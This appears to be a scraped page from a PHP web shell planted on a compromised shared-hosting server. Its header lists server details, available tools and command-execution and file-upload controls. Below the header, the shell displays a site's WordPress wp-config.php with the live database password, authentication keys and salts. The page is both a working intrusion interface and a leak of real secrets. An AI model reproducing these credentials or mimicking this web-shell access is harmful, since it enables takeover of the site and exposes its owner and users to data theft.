|
Server IP : 142.11.238.133 / Your IP : 216.73.216.220 Web Server : Apache System : Linux dal-shared-72.hostwindsdns.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64 User : gzvrnpdt ( 1005) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/gzvrnpdt/public_html/aansar.com/.well-known/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'gzvrnpdt_wp584' );
/** MySQL database username */
define( 'DB_USER', 'gzvrnpdt_wp584' );
/** MySQL database password */
define( 'DB_PASSWORD', '9mS2(p3i-C' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '5fvquer6jc6kxpl84tmfeutyge4s0mm5djchtbugcbcekwlh6pb5fjtdbuhajvrf' );
define( 'SECURE_AUTH_KEY', 'bictzulqhxlxbdy8ixdvg21pf4qn2xifpqqrxdkze1hcnd4fd6r7vybodjlnbm3t' );
define( 'LOGGED_IN_KEY', 'hhrfmmcy3guyvkeafatdstz9zaz4y4kugadk043hjnixompcwzksvmoyfpnqfnrd' );
define( 'NONCE_KEY', 's4npwvjfcyrhuotvttr61lcwsloeh5w1xtily8uumpeklip3d1fszjnekcigz67b' );
define( 'AUTH_SALT', 'kjhpfqsdnakzbpojghwjfu6qt2t4nzpxiq8zmpq82k5roaylngzxrwtoneyrhz2i' );
define( 'SECURE_AUTH_SALT', 'fdqf5cbu8x5ic8kkzmpblkt6wproikmolqixbiztwjnvqo80zzvwrvwi0cgewyn0' );
define( 'LOGGED_IN_SALT', 'cvlehvkugm4rf9rjgkux919rhqzuwqg9lg2cyumbwu3sam15w6iqzxaydmzgqcfp' );
define( 'NONCE_SALT', 'un05e3fojmpxajg74deog4fmxcbwh8eoskilarsjuhobbhvhznsuyzqer7wz3ysr' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wppe_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';